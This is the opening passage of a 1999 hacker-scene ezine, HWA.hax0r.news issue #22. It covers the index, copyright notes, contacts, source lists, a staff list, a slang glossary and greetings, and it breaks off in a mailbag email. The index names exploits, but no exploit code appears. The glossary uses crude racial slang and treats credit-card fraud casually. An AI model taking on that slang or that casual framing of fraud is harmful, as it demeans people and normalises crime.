[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
= <=-[ HWA.hax0r.news ]-=> =
==========================================================================
[=HWA'99=] Number 22 Volume 1 1999 June 26th 99
==========================================================================
[ 61:20:6B:69:64:20:63:6F:75: ]
[ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
[ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================
HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net
and www.digitalgeeks.com thanks to p0lix for the digitalgeeks bandwidth
and airportman for the Cubesoft bandwidth. Also shouts out to all our
mirror sites! tnx guys.
http://www.csoft.net/~hwa
http://www.digitalgeeks.com/hwa
HWA.hax0r.news Mirror Sites:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://packetstorm.harvard.edu/hwahaxornews/
http://archives.projectgamma.com/zines/hwa/
http://www.403-security.org/Htmls/hwa.hax0r.news.htm
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
Note:
This issue covers events from June 6th thru June 26th so don't be too
rough on me, I know this is a weekly production but I had to do 3 wks
in only a few days so forgive some of the bad formatting.
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
SYNOPSIS (READ THIS)
--------------------
The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news
and anything else I think is worthy of a look see. (remember i'm doing
this for me, not you, the fact some people happen to get a kick/use
out of it is of secondary importance).
This list is NOT meant as a replacement for, nor to compete with, the
likes of publications such as CuD or PHRACK or with news sites such as
AntiOnline, the Hacker News Network (HNN) or mailing lists such as
BUGTRAQ or ISN nor could any other 'digest' of this type do so.
It *is* intended however, to complement such material and provide a
reference to those who follow the culture by keeping tabs on as many
sources as possible and providing links to further info, its a labour
of love and will be continued for as long as I feel like it, i'm not
motivated by dollars or the illusion of fame, did you ever notice how
the most famous/infamous hackers are the ones that get caught? there's
a lot to be said for remaining just outside the circle...
@HWA
=-----------------------------------------------------------------------=
Welcome to HWA.hax0r.news ... #22
=-----------------------------------------------------------------------=
We could use some more people joining the channel, its usually pretty
quiet, we don't bite (usually) so if you're hanging out on irc stop
by and idle a while and say hi...
*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen'            ***
***                                                             ***
*** please join to discuss or impart news on techno/phac scene  ***
*** stuff or just to hang out ... someone is usually around 24/7***
***                                                             ***
*** Note that the channel isn't there to entertain you its for  ***
*** you to talk to us and impart news, if you're looking for fun***
*** then do NOT join our channel try #weirdwigs or something... ***
*** we're not #chatzone or #hack                                ***
***                                                             ***
*******************************************************************
=-------------------------------------------------------------------------=
Issue #22
=--------------------------------------------------------------------------=
[ INDEX ]
=--------------------------------------------------------------------------=
Key Intros
=--------------------------------------------------------------------------=
00.0 .. COPYRIGHTS ......................................................
00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
00.2 .. SOURCES .........................................................
00.3 .. THIS IS WHO WE ARE ..............................................
00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
00.5 .. THE HWA_FAQ V1.0 ................................................
=--------------------------------------------------------------------------=
Key Content
=--------------------------------------------------------------------------=
01.0 .. GREETS ..........................................................
01.1 .. Last minute stuff, rumours, newsbytes ...........................
01.2 .. Mailbag .........................................................
02.0 .. From the Editor..................................................
03.0 .. AntiOnline crosses the line......................................
03.1 .. More Questions Raised about John Vranesevich and AntiOnline .....
04.0 .. The Difficulties of Reporting the Underground....................
05.0 .. Mitnick Demonstrations Deemed a Huge Success ....................
06.0 .. New Trojan/Virus, PrettyPark ....................................
06.1 .. The rampage continues ...........................................
07.0 .. Eight Arrested in California (Piracy)............................
08.0 .. 278 Internet Cafes Disciplined ..................................
09.0 .. Forbidden Knowledge Issue #5 ....................................
10.0 .. f41th Issue 6 ...................................................
11.0 .. Antidote Vol2 Issue 7 ...........................................
12.0 .. Will the Allies Drop CyberBombs on Milosevic? ...................
13.0 .. Melissa Suspect Still not Charged ...............................
14.0 ..*ToorCon '99 Security Expo --------- DATE CHANGED! -----------....
15.0 .. ISS Gets Free Advertising .......................................
16.0 .. Accounting Firms also get Free Advertising ......................
17.0 .. Analyzer Starts Computer Security Business ......................
18.0 .. $2.9Bil in Piracy in The US......................................
19.0 .. Congress and NSA tangle over Echelon.............................
20.0 .. Emutronix Phone Hacking Products releases new Mach emulator......
21.0 .. Is That Spelled With a "PH" or an "F" ...........................
22.0 .. The Demonizing of the Hacker ....................................
23.0 .. More Email Worms/Trojan .........................................
24.0 .. Stanford Searches for "Hacker" ..................................
25.0 .. Mitnick Demo Pictures now Available..............................
26.0 .. Does Cracking Affect Consumer Confidence? .......................
27.0 .. Worm.ExploreZip is Causing Massive Damage .......................
28.0 .. Don't Forget About BackDoor-G, it is Still Around ...............
29.0 .. MS Antitrust Trial Looks at Security ...........................
30.0 .. Web Defacements Hindering Open Government .......................
31.0 .. Worm.ExploreZip Continues its Rampage ...........................
32.0 .. Senate web site hacked again(!)..................................
33.0 .. Mitnick Sentencing Hearing Rescheduled ..........................
34.0 .. Russia Looks to Beef Up its Version of Echelon...................
35.0 .. Company Claims CyberAttack by Competitor ........................
36.0 .. LA set to Allow Internet Voting .................................
37.0 .. CCC Camp Shapes Up ..............................................
38.0 .. Hong Kong Makes Major Piracy Bust ...............................
39.0 .. Ernst & Young Profile ...........................................
40.0 .. What is Your Privacy Worth? .....................................
41.0 .. BSA Tactics Condemned by UK .....................................
42.0 .. US Allows 128bit SSL Into Japan .................................
43.0 .. Terrorist About to Cause Electronic Chaos .......................
44.0 .. Major Remote Hole Found in IIS ..................................
45.0 .. Outlook Express 4.5 Email Bug ...................................
46.0 .. Major Pirates Convicted .........................................
47.0 .. Fear of Y2K Raises Security Concerns ............................
48.0 .. Israeli Banks Thwart Attempted Cyber Break-In ...................
49.0 .. Navy Wants Tighter Network Security .............................
50.0 .. IIS Hole Continues to Make News/Fix Available ...................
51.0 .. World Braces for International Day of Action ....................
52.0 .. ECD Targets Mexican Government ..................................
53.0 .. Cyber Attacks in Australia Double ...............................
54.0 .. SmartCards Next Stop for Internet Crime .........................
55.0 .. Internet Was Designed without Security ..........................
56.0 .. Original Apple I On the Auction Block ...........................
57.0 .. Microsoft Calls eEye Irresponsible ..............................
58.0 .. Has the FBI Overreacted? .......................................
59.0 .. Printer at Spa War Compromised .................................
60.0 .. Popular Singapore Sites Defaced .................................
61.0 .. DOD Says its CRAP! (Mustn't be Scottish) ........................
62.0 .. DOE Still Unsecure .............................................
63.0 .. Terrorists Use the Net .........................................
64.0 .. Beat the CIA at their own game? - crypto sculpture cracking .....
65.0 .. Pirates of Silicon Valley .......................................
66.0 .. .mil hacker cartoon .............................................
67.0 .. If Software Breaks Who is Liable? . .............................
68.0 .. Trinux Release 0.61 ............................................
69.0 .. Australia Looks to Increase Local Police Powers ................
70.0 .. Aussie Gov Downloads Porn ......................................
71.0 .. Software Glitch or Security Breach .............................
72.0 .. Viruses Cost Companies Big Dough ...............................
73.0 .. B4B0 Issue 8 Released. .........................................
74.0 .. f41th Issue 7 ..................................................
75.0 .. DOD Considers New Network ......................................
76.0 .. NCIS Calls For National Computer Crime Squad ...................
77.0 .. !Hispahack Found Not Guilty ....................................
78.0 .. asahi.com Defaced ...............................................
79.0 .. NSTAC Releases Reports .........................................
80.0 .. FBI This Week ..................................................
81.0 .. Cartoon Hackers?? (From HNN rumours section) ....................
82.0 .. Nuke Labs Stand Down ...........................................
83.0 .. X-Force Down Under is Hiring ...................................
84.0 .. More Canadian RedBoxing from HackCanada with the RIO ............
85.0 .. SecureMac is Now Open ..........................................
86.0 .. Microsoft Demands Privacy ......................................
87.0 .. Pentium III has 46 Bugs ........................................
88.0 .. 'War' Against FBI Continues ....................................
89.0 .. Singapore Officials Arrest Two .................................
90.0 .. GSA Looking for IDS ............................................
91.0 ..+Theres Money in them thar videos! (DEFCON WEBCAST) ..............
92.0 .. Kasparov Defaced? ..............................................
93.0 .. Russ Cooper Interview ..........................................
94.0 .. Thanks-CGI Defaced With Its Own Script .........................
95.0 .. *ToorCon Date Changes --------- DATE CHANGE! ----------.........
96.0 .. Gov Vulnerable Due to Lack of Training .........................
97.0 .. Need skewled in juarez?: Teeside University Offers Degree in Warez
98.0 ..+FREE DefCon WebCasts ...........................................
99.0 .. Old Modem Flaw Still Haunts Users ...............................
(... some modem users may be disconnected at the end of this ezine ;)
100.0 .. Another government server cracked today .........................
101.0 .. MailMan.cookie attack ...........................................
102.0 .. misfrag.c nasty piece of code from P.A.T.C.H ....................
103.0 .. Double-byte code vulnerability, MS Security Bulletin ............
104.0 .. 50 Ways to defeat your IDS.......................................
105.0 .. 50 reasons IDS systems work by Ron Gula..........................
106.0 .. June 15th: Bruce Schneier's Cryptogram...........................
107.0 .. pop.c pop-2, remote exploit by smiler............................
108.0 .. afio: security hole in 'afio -P pgp' encrypted archives..........
109.0 .. C-Mail SMTP Server Remote Buffer Overflow Exploit................
110.0 .. CIAC Bulletin J-044: Tru64/Digital UNIX (dtlogin) Security Vulnerability
111.0 .. The IIS4 eEye security advisory and threads as mentioned previously
112.0 .. BO server flooder sends random spoofed udp's to the attacker......
113.0 .. frootcake.c revisited.............................................
114.0 .. gin.c spoofs packets containing + + + ATH0 which causes some modems to hang up
115.0 .. IIS Remote Exploit (injection code)...............................
116.0 .. ActiveX security revisited........................................
117.0 .. denial of service attack against NT PDC from Win95 workstation....
118.0 .. Microsoft win2k PASV vulnerability................................
119.0 .. useradd -p stores cleartext passwords / shadow-980724.............
120.0 .. UID 65536 and shadow-19990307 root compromise.....................
121.0 .. big brother in your cc(!) ........................................
122.0 .. TCP MD5 option problem (router DoS)...............................
123.0 .. tcpdump 3.4 bug? (DoS)...........................................
124.0 .. [ISN] A mouse that roars? ........................................
125.0 .. [ISN] Product Review: NOVaSTOR DataSAFE...........................
126.0 .. [ISN] Technology a threat to right of privacy Silicon Valley......
=--------------------------------------------------------------------------=
RUMOURS .Rumours from around and about, mainly HNN stuff (not hacked websites)
AD.S .. Post your site ads or etc here, if you can offer something in return
thats tres cool, if not we'll consider ur ad anyways so send it in.
ads for other zines are ok too btw just mention us in yours, please
remember to include links and an email contact. Corporate ads will
be considered also and if your company wishes to donate to or
participate in the upcoming Canc0n99 event send in your suggestions
and ads now...n.b date and time may be pushed back join mailing list
for up to date information.......................................
Current dates: Aug19th-22nd Niagara Falls... .................
HA.HA .. Humour and puzzles ............................................
Hey You!........................................................
=------=........................................................
Send in humour for this section! I need a laugh and its hard to
find good stuff... ;)...........................................
SITE.1 .. Featured site, .................................................
H.W .. Hacked Websites ...............................................
A.0 .. APPENDICES......................................................
A.1 .. PHACVW linx and references......................................
=--------------------------------------------------------------------------=
@HWA'99
00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE
OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO
WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT
(LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST
READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).
Important semi-legalese and license to redistribute:
YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF
AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE
ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED
IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE
APPRECIATED the current link is http://welcome.to/HWA.hax0r.news
IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK
ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL
ME PRIVATELY current email cruciphux@dok.org
THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL
WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL
THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:
I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE
AND REDISTRIBUTE/MIRROR. - EoD
Although this file and all future issues are now copyright, some of
the content holds its own copyright and these are printed and
respected. News is news so i'll print any and all news but will quote
sources when the source is known, if its good enough for CNN its good
enough for me. And i'm doing it for free on my own time so pfffft. :)
No monies are made or sought through the distribution of this material.
If you have a problem or concern email me and we'll discuss it.
cruciphux@dok.org
Cruciphux [C*:.]
00.1 CONTACT INFORMATION AND MAIL DROP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
Canada / North America (hell even if you are inside ..) and wish to
send printed matter like newspaper clippings a subscription to your
cool foreign hacking zine or photos, small non-explosive packages
or sensitive information etc etc well, now you can. (w00t) please
no more inflatable sheep or plastic dog droppings, or fake vomit
thanks.
Send all goodies to:
HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5
WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
~~~~~~~ reading this from some interesting places, make my day and get a
mention in the zine, send in a postcard, I realize that some places
it is cost prohibitive but if you have the time and money be a cool
dude / gal and send a poor guy a postcard preferably one that has some
scenery from your place of residence for my collection, I collect stamps
too so you kill two birds with one stone by being cool and mailing in a
postcard, return address not necessary, just a "hey guys being cool in
Bahrain, take it easy" will do ... ;-) thanx.
Ideas for interesting 'stuff' to send in apart from news:
- Photo copies of old system manual front pages (optionally signed by you) ;-)
- Photos of yourself, your mom, sister, dog and or cat in a NON
compromising position plz I don't want pr0n.
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
tapes with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone
fun or social engineering examples or transcripts thereof.
If you still can't think of anything you're probably not that interesting
a person after all so don't worry about it
Our current email:
Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas72@usa.net
@HWA
00.2 Sources ***
~~~~~~~~~~~
Sources can be some, all, or none of the following (by no means complete
nor listed in any degree of importance) Unless otherwise noted, like msgs
from lists or news from other sites, articles and information is compiled
and or sourced by Cruciphux no copyright claimed.
News & I/O zine ................. http://www.antionline.com/
Back Orifice/cDc..................http://www.cultdeadcow.com/
News site (HNN) ..................http://www.hackernews.com/
Help Net Security.................http://net-security.org/
News,Advisories,++ ...............http://www.l0pht.com/
NewsTrolls .......................http://www.newstrolls.com/
News + Exploit archive ...........http://www.rootshell.com/beta/news.html
CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest
News site+........................http://www.zdnet.com/
News site+Security................http://www.gammaforce.org/
News site+Security................http://www.projectgamma.com/
News site+Security................http://securityhole.8m.com/
News site+Security related site...http://www.403-security.org/
News/Humour site+ ................
http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
http://www.ottawacitizen.com/business/
http://search.yahoo.com.sg/search/news_sg?p=hack
http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
http://www.zdnet.com/zdtv/cybercrime/
http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)
NOTE: See appendices for details on other links.
http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
http://freespeech.org/eua/ Electronic Underground Affiliation
http://ech0.cjb.net ech0 Security
http://axon.jccc.net/hir/ Hackers Information Report
http://net-security.org Net Security
http://www.403-security.org Daily news and security related site
Submissions/Hints/Tips/Etc
~~~~~~~~~~~~~~~~~~~~~~~~~~
All submissions that are `published' are printed with the credits
you provide, if no response is received by a week or two it is assumed
that you don't care whether the article/email is to be used in an issue
or not and may be used at my discretion.
Looking for:
Good news sites that are not already listed here OR on the HNN affiliates
page at http://www.hackernews.com/affiliates.html
Magazines (complete or just the articles) of breaking sekurity or hacker
activity in your region, this includes telephone phraud and any other
technological use, abuse hole or cool thingy. ;-) cut em out and send it
to the drop box.
- Ed
Mailing List Subscription Info (Far from complete) Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~
ISS Security mailing list faq : http://www.iss.net/iss/maillist.html
THE MOST READ:
BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~
What is Bugtraq?
Bugtraq is a full-disclosure UNIX security mailing list, (see the info
file) started by Scott Chasin. To subscribe to
bugtraq, send mail to listserv@netspace.org containing the message body
subscribe bugtraq. I've been archiving this list on the web since late
1993. It is searchable with glimpse and archived on-the-fly with hypermail.
Searchable Hypermail Index;
http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html
Link
About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The following comes from Bugtraq's info file:
This list is for *detailed* discussion of UNIX security holes: what they are,
how to exploit, and what to do to fix them.
This list is not intended to be about cracking systems or exploiting their
vulnerabilities. It is about defining, recognizing, and preventing use of
security holes and risks.
Please refrain from posting one-line messages or messages that do not contain
any substance that can relate to this list`s charter.
I will allow certain informational posts regarding updates to security tools,
documents, etc. But I will not tolerate any unnecessary or nonessential "noise"
on this list.
Please follow the below guidelines on what kind of information should be posted
to the Bugtraq list:
+ Information on Unix related security holes/backdoors (past and present)
+ Exploit programs, scripts or detailed processes about the above
+ Patches, workarounds, fixes
+ Announcements, advisories or warnings
+ Ideas, future plans or current works dealing with Unix security
+ Information material regarding vendor contacts and procedures
+ Individual experiences in dealing with above vendors or security organizations
+ Incident advisories or informational reporting
Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq
reflector address if the response does not meet the above criteria.
Remember: YOYOW.
You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of
those words without your permission in any medium outside the distribution of this list may be challenged by you, the author.
For questions or comments, please mail me:
chasin@crimelab.com (Scott Chasin)
Crypto-Gram
~~~~~~~~~~~
CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
insights, and commentaries on cryptography and computer security.
To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe,
visit http://www.counterpane.com/unsubform.html. Back issues are available
on http://www.counterpane.com.
CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of
Counterpane Systems, the author of "Applied Cryptography," and an inventor
of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of
the International Association for Cryptologic Research, EPIC, and VTW. He
is a frequent writer and lecturer on cryptography.
CUD Computer Underground Digest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This info directly from their latest ish:
Computer underground Digest Sun 14 Feb, 1999 Volume 11 : Issue 09
ISSN 1004-042X
Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
Archivist: Brendan Kehoe
Poof Reader: Etaion Shrdlu, Jr.
Shadow-Archivists: Dan Carosone / Paul Southworth
Ralph Sims / Jyrki Kuoppala
Ian Dickinson
Cu Digest Homepage: http://www.soci.niu.edu/~cudigest
[ISN] Security list
~~~~~~~~~~~~~~~~~~~
This is a low volume list with lots of informative articles, if I had my
way i'd reproduce them ALL here, well almost all .... ;-) - Ed
Subscribe: mail majordomo@repsec.com with "subscribe isn".
@HWA
00.3 THIS IS WHO WE ARE
~~~~~~~~~~~~~~~~~~
Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/IRC+ man in black
sas72@usa.net.............: currently active/IRC+ distribution
vexxation@usa.net.........: currently active/IRC+ proof reader/grrl in black
dicentra..(email withheld): IRC+ grrl in black
Foreign Correspondents/affiliate members
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
N0Portz ..........................: Australia
Qubik ............................: United Kingdom
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck ........................: Netherlands/Holland
And unofficially yet contributing too much to ignore ;)
Spikeman .........................: World media
Please send in your sites for inclusion here if you haven't already
also if you want your emails listed send me a note ... - Ed
Spikeman's site is down as of this writing, if it comes back online it will be
posted here.
http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)
*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen'            ***
*******************************************************************
:-p
1. We do NOT work for the government in any shape or form.Unless you count paying
taxes ... in which case we work for the gov't in a BIG WAY. :-/
2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news
events its a good idea to check out issue #1 at least and possibly also the
Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ...
@HWA
00.4 Whats in a name? why HWA.hax0r.news??
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Well what does HWA stand for? never mind if you ever find out I may
have to get those hax0rs from 'Hackers' or the Pretorians after you.
In case you couldn't figure it out hax0r is "new skewl" and although
it is laughed at, shunned, or even pigeonholed with those 'dumb
leet (l33t?) dewds' this is the state of affairs. It ain't Stephen
Levy's HACKERS anymore. BTW to all you up and comers, i'd highly
recommend you get that book. It's almost like buying a clue.
Anyway..on with the show .. - Editorial staff
@HWA
00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Also released in issue #3. (revised) check that issue for the faq
it won't be reprinted unless changed in a big way with the exception
of the following excerpt from the FAQ, included to assist first time
readers:
Some of the terms related to personal usage and use in this zine are
listed below: Some are very useful, others attempt to deny any possible
attempts at eschewing obfuscation by obscuring their actual definitions.
@HWA - see EoA ;-)
!= - Mathematical notation "is not equal to" or "does not equal"
ASC(247) "wavy equals" sign means "almost equal" to. If written
an =/= (equals sign with a slash thru it) also means !=, =< is Equal
to or less than and => is equal to or greater than (etc, this aint
fucking grade school, cripes, don't believe I just typed all that..)
AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)
AOL - A great deal of people that got ripped off for net access by a huge
clueless isp with sekurity that you can drive buses through, we're
not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the
least they could try leasing one??
*CC - 1 - Credit Card (as in phraud)
2 - .cc is COCOS (Keeling) ISLANDS but they probably accept cc's
CCC - Chaos Computer Club (Germany)
*CON - Conference, a place hackers crackers and hax0rs among others go to swap
ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk
watch videos and seminars, get drunk, listen to speakers, and last but
not least, get drunk.
*CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker
speak he's the guy that breaks into systems and is often (but by no
means always) a "script kiddie" see pheer
2 . An edible biscuit usually crappy tasting without a nice dip, I like
jalapeno pepper dip or chives sour cream and onion, yum - Ed
Ebonics - speaking like a rastafarian or hip dude of colour also wigger
Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
ebonics, speaking in a dark tongue ... being ereet, see pheer
EoC - End of Commentary
EoA - End of Article or more commonly @HWA
EoF - End of file
EoD - End of diatribe (AOL'ers: look it up)
FUD - Coined by Unknown and made famous by HNN - "Fear uncertainty and doubt",
usually in general media articles not high brow articles such as ours or other
HNN affiliates ;)
du0d - a small furry animal that scurries over keyboards causing people to type
weird crap on irc, hence when someone says something stupid or off topic
'du0d wtf are you talkin about' may be used.
*HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R
*HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to
define, I think it is best defined as pop culture's view on The Hacker ala
movies such as well erhm "Hackers" and The Net etc... usually used by "real"
hackers or crackers in a derogatory or slang humorous way, like 'hax0r me
some coffee?' or can you hax0r some bread on the way to the table please?'
2 - A tool for cutting sheet metal.
HHN - Maybe a bit confusing with HNN but we did spring to life around the same
time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper
noun means the hackernews site proper. k? k. ;&
HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html
J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d
MFI/MOI- Missing on/from IRC
NFC - Depends on context: No Further Comment or No Fucking Comment
NFR - Network Flight Recorder (Do a websearch) see 0wn3d
NFW - No fuckin'way
*0WN3D - You are cracked and owned by an elite entity see pheer
*OFCS - Oh for christ's sakes
PHACV - And variations of same
Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare
Alternates: H - hacking, hacktivist
C - Cracking
V - Virus
W - Warfare
A - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
P - Phreaking, "telephone hacking" PHone fREAKs ...
CT - Cyber Terrorism
*PHEER - This is what you do when an ereet or elite person is in your presence
see 0wn3d
*RTFM - Read the fucking manual - not always applicable since some manuals are
pure shit but if the answer you seek is indeed in the manual then you
should have RTFM you dumb ass.
TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0
TBA - To Be Arranged/To Be Announced also 2ba
TFS - Tough fucking shit.
*w00t - 1 - Reserved for the uber ereet, no one can say this without severe repercussions
from the underground masses. also "w00ten"
2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)
*wtf - what the fuck
*ZEN - The state you reach when you *think* you know everything (but really don't)
usually shortly after reaching the ZEN like state something will break that
you just 'fixed' or tweaked.
@HWA
-=- :. .: -=-
01.0 Greets!?!?! yeah greets! w0w huh. - Ed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Thanks to all in the community for their support and interest but i'd
like to see more reader input, help me out here, whats good, what sucks
etc, not that I guarantee i'll take any notice mind you, but send in
your thoughts anyway.
* all the people who sent in cool emails and support
FProphet Pyra TwstdPair _NeM_
D----Y Kevin Mitnick (watch yer back) Dicentra
vexxation sAs72 Spikeman Astral
p0lix Vexx g0at security Ken
pr0xy Astral
and the #innerpulse, crew (innerpulse is back!) and some inhabitants
of #leetchans .... although I use the term 'leet loosely these days,
;)
kewl sites:
+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://www.freekevin.com/
+ http://www.genocide2600.com/
+ http://www.packetstorm.harvard.edu/
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/
+ http://www.403-security.org/
+ http://ech0.cjb.net/
@HWA
01.1 Last minute stuff, rumours and newsbytes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"What is popular isn't always right, and what is right isn't
always popular..."
- FProphet '99
+++ When was the last time you backed up your important data?
++ PacketStorm Security's site has MOVED, update your links to
http://packetstorm.harvard.edu/
++ Spikeman's DoS site is no more, it has been removed from the
Genocide2600 servers, there are no immediate plans to revive the
site but Spike says he hasn't ruled out the possibility completely
and has had an offer to host the site from another provider.
Mucho thanks to Spikeman for directing his efforts to our cause of bringing
you the news we want to read about in a timely manner ... - Ed
@HWA
01.2 MAILBAG - email and posts from the message board worthy of a read
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
================================================================
Delivered-To: dok-cruciphux@dok.org
Received: (qmail 11079 invoked from network); 14 Jun 1999 03:48:22 -0000
Received: from md.egroups.com (207.138.41.139)
by physical.graffiti.datacrest.com with SMTP; 14 Jun 1999 03:48:22 -0000
Received: from [10.1.1.23] by md.egroups.com with NNFMP; 14 Jun 1999 04:48:18 -0000
Mailing-List: contact a-s_mag-owner@egroups.com
X-Mailing-List: a-s_mag@egroups.com
X-URL: http://www.egroups.com/list/a-s_mag/
Delivered-To: listsaver-egroups-a-s_mag@egroups.com
Received: (qmail 3968 invoked by uid 7770); 14 Jun 1999 03:43:43 -0000
Received: from ah-img-2.compuserve.com (HELO hpamgaab.compuserve.com) (149.174.217.153)
by vault.egroups.com with SMTP; 14 Jun 1999 03:43:43 -0000
Received: (from mailgate@localhost)
by hpamgaab.compuserve.com (8.8.8/8.8.8/HP-1.5) id XAA29122
for a-s_mag@egroups.com; Sun, 13 Jun 1999 23:43:42 -0400 (EDT)
Date: Sun, 13 Jun 1999 23:43:11 -0400
From: "Armageddon."
Sender: "Armageddon."
To: A-S subscribers
Message-ID: <199906132343_MC2-793F-3C4B@compuserve.com>
MIME-Version: 1.0
Content-Disposition: inline
Subject: [a-s_mag] Important : A-S Meet-up date.
Content-Type: text/plain; charset=ISO-8859-1
Hi,
There has been a change to the date of the A-S meet-up, as you
probably read in A-S14 we said the date would be the 24th of July. This
has had to be changed as it's been discovered that it's not actually going to
clash with Compulsion as we planned. The new date is : 31st of July.
I'll be re-uploading A-S14 correcting this in the magazine to soften the
blow of readers who have the wrong date. Those who contacted us via email
will all be contacted with the new details and posts will go out on the
news groups and in as many other magazines that we know have readers who
planned to attend as we can possibly get to.
Sorry if this date change causes you problems, on the bright side however I
